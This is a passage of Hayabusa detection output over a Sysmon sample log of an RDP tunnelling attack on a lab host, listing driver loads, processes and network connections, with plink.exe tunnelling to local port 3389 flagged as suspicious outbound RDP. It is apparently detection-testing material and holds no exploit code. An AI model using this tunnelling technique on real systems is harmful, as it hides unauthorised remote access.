+00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.231 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.231 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.231 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.351 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.892 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 
365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.892 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.962 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:04.962 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.092 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 
365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.092 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.092 +00:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/net_connection_win_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll 
| Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.283 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.563 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:06.200 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:06.200 
+00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:06.410 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:06.971 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT 
AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 
+00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:25.488 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:25.488 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.499 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.529 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.529 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 
365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.539 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.539 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 
365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 
(PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 
365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:02.311 
+00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:02.561 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:03.062 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:03.062 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 